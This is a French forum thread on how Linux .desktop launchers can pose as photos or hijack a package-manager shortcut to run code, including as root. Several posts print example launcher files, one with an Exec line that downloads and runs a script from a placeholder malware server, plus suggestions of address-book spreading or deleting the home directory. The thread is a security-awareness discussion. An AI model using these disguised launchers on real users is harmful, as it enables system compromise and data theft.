Ce site est optimisé pour être consulté depuis un navigateur moderne dans lequel JavaScript est activé.

Les fichiers *.desktop, dangereux ?

Adhémar

Vous savez sans doute tous qu'une des sécurités de linux, c'est entre le fait que les fichiers téléchargés ne sont pas exécutables par défaut. Tous ? Ben, pas vraiment, il y a certains moyens de contourner ça. Par exemple, les archives peuvent par exemple préserver le status d'exécutable. Bon, évidement, de là à faire un virus, y'a un pas. Il faudrait télécharger l'archive puis exécuter son contenu. Si il y a une faille ici, c'est dans l'interface chaise-clavier.

Mais on peut faire mieux, comme le révèle ce blog: http://www.geekzone.co.nz/foobar/6229. En gros, pour résumer la technique, en français: on crée un fichier photo.desktop sans extension, et dans le fichier, on met:

[Desktop Entry]
Name=photo.jpg
Exec=bash -c 'touch succes' 
Icon=/usr/share/icons/default.kde4/128x128/mimetypes/image-jpeg.png
Terminal=true

Si vous téléchargez le fichier, il apparaitra dans votre gestionnaire de paquet avec une icône de photo. Si vous cliquez dessus, il va dans ce cas-ci créer un fichier qui s'appelle succes. Ceci dit, on peut changer la commande 'touch success' par des trucs beaucoup moins marrants. Par exemple, on peut aller télécharger un script extérieur via wget qui va chercher les adresses du carnet de mail, et renvoyer le malware à tout le carnet d'adresse (pas besoin de droits root pour ça), ou supprimer le répertoire utilisateur, etc...

Mais on peut faire mieux. En gros, on peut prendre un script qui va changer le fichier desktop du gestionnaire de paquet (pas besoins de droits root pour ça).

[Desktop Entry]
Name=Adept Package Manager
Exec=kdesudo synaptic
Icon=adept
Terminal=false

[Desktop Entry]
Name=Adept Package Manager
Exec=kdesudo adept & .hidden/malware.sh
Icon=adept
Terminal=false

Et là, vous venez de lancer le programme malware.sh en root, l'auteur du programme fait ce qu'il veut de votre ordi.

Vous en pensez quoi ? Ce n'est pas un virus à proprement parler, parce qu'il ne sait pas se reproduire tout seul, et repose sur une bonne dose d'ingénierie sociale, mais la facilité avec laquelle on peut tromper l'utilisateur me semble déconcertante. Cela montre qu'encore une fois, la sécurité, ce n'est pas un programme, c'est un état d'esprit 🙂.

A+

Adh'

Bigcake

Si je peux tu me permet, une petite modification dans ta dernière phrase s'impose 😛

Adhémar a écritCela montre qu'encore une fois, la sécurité, ce n'est pas qu'un programme, c'est aussi un état d'esprit

Ce a quoi je ne peux qu'être en accord :cool:

Adhémar

Bigcake a écritSi je peux tu me permet, une petite modification dans ta dernière phrase s'impose 😛
Adhémar a écritCela montre qu'encore une fois, la sécurité, ce n'est pas qu'un programme, c'est aussi un état d'esprit
Ce a quoi je ne peux qu'être en accord :cool:

🙂 Tout à fait d'accord...

giliam

C'est quoi sinon ces fichiers ".desktop"?

Link31

Il ne faut jamais lancer de programme graphique en root, et toujours passer par le terminal pour les tâches d'administration.

Grâce aux logiciels et distributions qui se veulent "grand public", et en particulier Ubuntu, on est en train de perdre les bonnes habitudes qui ont fait la réputation des systèmes UNIX et on s'avance petit à petit vers un nouveau windows...

billou

Et blablabla, je n'ai rien contre la ligne de commande, j'en consomme même avec gourmandise, mais le pauvre néophyte qui se fiche totalement du fonctionnement de son ordi et s'en sert juste pour la base (messagerie instantanée, taper ses CV, surfer sur internet, lire sa musique et des vidéos) n'as pas à devoir savoir s'en servir.

Le terminal, c'est de l'anti-ergonomique par excellence pour Mr tout le monde, et c'est pas parce que pour nous il s'agit d'un outil merveilleux, qu'il doit en être de même pour les autres, et que ce sont de pauvres boulets/moutons inintelligibles qui ne veulent rien apprendre.

Le choix, la liberté, c'est ce qui fait notre force. UBUNTU. (Je suis ce que je suis, par ce que nous sommes TOUS)

Ps : J'ai déjà lancé une session graphique en Root, et même des programmes, et je n'ai jamais eu de soucis, je savais ce que je faisait et pourquoi je le faisait c'est tout.

bloublou

giliam a écritC'est quoi sinon ces fichiers ".desktop"?

Les lanceurs sur le bureau ou dans la barre gnome,par exemple.

Yannick_LM

Grâce aux logiciels et distributions qui se veulent "grand public", et en particulier Ubuntu, on est en train de perdre les bonnes habitudes qui ont fait la réputation des systèmes UNIX et on s'avance petit à petit vers un nouveau windows...

Meuh non. Tant que l'OS reste libre, y a aucun risque qu'il y ait les mêmes problèmes de sécu que sous windows.

Tout simplement parce que tout le monde a intérêt à ce qu'il y ait des soucis sous Windows : l'entreprise Microsoft elle-même, et bien sûr toutes les boîtes en conseil/audit/sécurité/antivirus.

Sous ubuntu, ça restera l'inverse pendant encore un bout de temps.

Et en ce qui concerne les problèmes de sécurité posés par les applications graphiques, j'aimerai souligner qu'ils sont au contraire de mieux en mieux pris en compte : il est maintenant possible de n'accorder les droits root que pour quelques actions précises, sans avoir besoin de lancer l'application en root.

(Pensez au nouveau gestionnaire « utilisateurs et groupes », par exemple)

mahikeulbody

Link31 a écritIl ne faut jamais lancer de programme graphique en root, et toujours passer par le terminal pour les tâches d'administration.

Grâce aux logiciels et distributions qui se veulent "grand public", et en particulier Ubuntu, on est en train de perdre les bonnes habitudes qui ont fait la réputation des systèmes UNIX et on s'avance petit à petit vers un nouveau windows...

Je ne suis pas expert (je débute sous Linux) mais quel rapport avec la choucroute ? Dans les premiers exemples donnés dans le post initial, je n'ai pas vu qu'il était question de programme graphique lancé en root et pourtant il semble bien y avoir un risque (j'attache plus d'importance à mes données perso qu'à mon Intrepid).

Link31

mahikeulbody a écritJe ne suis pas expert (je débute sous Linux) mais quel rapport avec la choucroute ? Dans les exemples donnés dans le post initial, je n'ai pas vu qu'il était question de programme graphique lancé en root.

On parle d'un .desktop (raccourci) vers Adept qui contient la commande "kdesudo adept", et qui pourrait aussi bien contenir la commande "kdesudo adept & ./virus.sh" sans que l'utilisateur, qui lance Adept graphiquement, s'en aperçoive.

mahikeulbody

Link31 a écrit
mahikeulbody a écritJe ne suis pas expert (je débute sous Linux) mais quel rapport avec la choucroute ? Dans les exemples donnés dans le post initial, je n'ai pas vu qu'il était question de programme graphique lancé en root.
On parle d'un .desktop (raccourci) vers Adept qui contient la commande "kdesudo adept", et qui pourrait aussi bien contenir la commande "kdesudo adept & ./virus.sh" sans que l'utilisateur, qui lance Adept graphiquement, s'en aperçoive.

Oui, j'ai vu ça après avoir posté et j'ai donc modifié mon post (qui s'est croisé avec le tien) mais ma remarque reste.

Adhémar

Link31 a écritOn parle d'un .desktop (raccourci) vers Adept qui contient la commande "kdesudo adept", et qui pourrait aussi bien contenir la commande "kdesudo adept & ./virus.sh" sans que l'utilisateur, qui lance Adept graphiquement, s'en aperçoive.

Il y aurait une solution plus simple. Donner aux fichiers .desktop le même status qu'un fichier exécutable. Si il n'est pas taggué comme exécutable, il ne s'exécutera pas. Quand tu installes un programme ou que tu crées un raccourci vers une application, le programme s'occupe de faire le chmod +x, et quand tu télécharges un fichier, celui ci n'est naturellement pas exécutable. Le seul problème qui resterait, c'est des fichiers desktop dans des archives qui serait naturellement exécutables. Mais là, une simple modification du gestionnaire d'archive pourrait prévenir que l'archive contient des exécutables (un peu comme firefox, avt de télécharger un nouveau *.xpi).

Je ne suis pas expert (je débute sous Linux) mais quel rapport avec la choucroute ? Dans les premiers exemples donnés dans le post initial, je n'ai pas vu qu'il était question de programme graphique lancé en root et pourtant il semble bien y avoir un risque (j'attache plus d'importance à mes données perso qu'à mon Intrepid).

Le but de mon post n'était pas d'inquiéter, mais juste de montrer que la création d'un malware sous linux pouvait être beaucoup plus simple que ce qu'on dit parfois. Comme dit dans le second message, la sécurité, c'est à la fois l'affaire de l'OS et de l'utilisateur. Bref, ce n'est pas parce qu'on est sous linux qui est un OS particulièrement sûr qu'il faille négliger toutes des pratiques de sécurités de base.

Ce qu'il faut se rendre compte c'est que, par exemple, quand tu copie/colle une commande que quelqu'un te donne sur un forum, tu fais implicitement confiance en cette personne. Quand tu vas chercher des debs sur un site quelconque, tu fais implicitement confiance au packager. De même, quand tu télécharges des pièces jointes d'un mail, tu fais confiance à celui qui t'envoie le mail, et au contenu des pièces jointes. Je ne pense pas qu'il soit nécessaire de revenir à la ligne de commande, mais simplement de réfléchir à deux fois avant de cliquer comme un possédé sur n'importe quelle pièce jointe.

A+

Adhémar

mahikeulbody

En ce qui me concerne je réagissais juste à ce post:

Il ne faut jamais lancer de programme graphique en root, et toujours passer par le terminal pour les tâches d'administration.

Grâce aux logiciels et distributions qui se veulent "grand public", et en particulier Ubuntu, on est en train de perdre les bonnes habitudes qui ont fait la réputation des systèmes UNIX et on s'avance petit à petit vers un nouveau windows...

Le problème que tu décris dans tes exemples (hormis celui avec le sudo) n'impliquant pas d'être root pour qu'il puisse y avoir un risque, j'ai trouvé la "tirade" sur les distributions "grand public" un peu déplacée dans ce contexte.

Ras'

Adhémar a écritMais on peut faire mieux. En gros, on peut prendre un script qui va changer le fichier desktop du gestionnaire de paquet (pas besoins de droits root pour ça).

Ton script a besoin des droits d'exécution pour fonctionner 😉
Et dans ce cas faut que l'utilisateur lui donne à un moment ou à un autre... Ou qu'il aille chercher un script de derrière les fagots, non officiel, etcetc... et là ben c'est un peu la faute de l'user d'avoir installé un truc sans chercher à savoir ce que ça faisait réellement.

C'est vrai qu'on fait l'apologie des scripts, des nautilus-scripts en l'occurence, mais faut se rappeler que ça peut donner de mauvaises habitudes... vu que ça m'étonnerais que tout le monde lise ses scripts et les comprennent avant de les exécuter...

Adhémar

Ras' a écritTon script a besoin des droits d'exécution pour fonctionner 😉

Non, justement, c'est là la faille. Les fichiers desktop n'ont pas besoin d'être marqués comme exécutables pour s'exécuter, et tu peux lancer n'importe quoi dedans. J'ai fait un fichier desktop avec

[Desktop Entry]
Name=photo.jpg
Exec=bash -c 'touch succes' 
Icon=/usr/share/icons/default.kde4/128x128/mimetypes/image-jpeg.png
Terminal=true

Mais j'aurais très bien pu mettre

[Desktop Entry]
Name=photo.jpg
Exec=bash -c 'wget http://www.some_malware_server.org/malware.sh; chmod +x malware.sh; ./malware.sh' 
Icon=/usr/share/icons/default.kde4/128x128/mimetypes/image-jpeg.png
Terminal=true

Tu peux essayer de le faire toi même, en remplaçant la commande par un bête 'touch essai; chmod +x essai', et tu verras que ton fichier essai sera bien exécutable.

A+

Adhémar

Ras'

Tout fichier .desktop n'a pas besoin d'être chmodé +x pour s'exécuter ?
C'est louche tout de même...

Hum... j'essai mais je vois pas ou faut le créer pour qu'il apparaisse dans les aps ? En le créant nimporte ou (sur le bureau) et en essayant de double clicker dessus il me raconte que l'emplacement n'est pas un dossier :\
Connait pas bien le fonctionnement de ces machins moi :\

Adhémar

Regarde, c'est simple... Dans ton home, crée un fichier photo, et dedans, tu met:

[Desktop Entry]
Name=photo
Exec=bash -c 'touch succes;chmod +x succes' 
Icon=/usr/share/icons/default.kde4/128x128/mimetypes/image-jpeg.png
Terminal=true
Type=Application

Si tu es sous gnome, tu devras changer le Icon en autre chose. Sinon, tu supprimes la ligne, ce n'est pas important.

Là, tu peux vérifier que le fichier desktop n'a pas les droits d'éxécution. Et, vu que ton fichier n'a pas d'extension, ton OS va la deviner en lisant le fichier, en l'occurence, tu auras un fichier desktop, avec une icone d'image. Tu cliques dessus, et tu vas voir qu'il va créer un fichier succes, qui a des droits d'éxécution...

Sinon, les fichiers desktop peuvent être stockés dans .local/share/applications/

A+

Adhémar

Ras'

Ah 😉
Ca marchais pas sur le bureau c'est pour ça ^^

Reste qu'il faut que quelque chose qui créé le malware... donc soit un autre script, soit un autre fichier desktop, ou télécharger directement ce fichier desktop... enfin, faut que l'user fasse quelque chose qui n'est pas dans les règles de la sécurité 😉

Link31

mahikeulbody a écritLe problème que tu décris dans tes exemples (hormis celui avec le sudo) n'impliquant pas d'être root pour qu'il puisse y avoir un risque, j'ai trouvé la "tirade" sur les distributions "grand public" un peu déplacée dans ce contexte.

Quand un utilisateur se fie uniquement à un fichier synaptic.desktop pour lancer son gestionnaire de paquet, et ne sait pas que ce fichier contient en fait des commandes qui vont être exécutées en root (puisqu'il aura docilement donné son mot de passe dans la fenêtre graphique qui s'affiche), le tout combiné à la faille du sudo graphique mise en évidence récemment sous Ubuntu, ça fait déjà beaucoup de choses.

Au moins, quand on n'utilisait que le terminal pour effectuer des commandes d'administration, on était à l'abri d'un certain nombre de ces problèmes.

turbo-gus

Donc cela veut dire que si j'utilise un raccourci bureau ou le raccourci dans "systeme > administration > synaptic " pour lancer mon gestionnaire de paquet, il y a un risque pour la sécurité de mon système ?? :/

Par rapport à ce probleme avec "sudo", y-a-t-il un moyen de le supprimer et de passer par un "su-" et "mot de passe" comme sur Debian par exemple ?

Page suivante »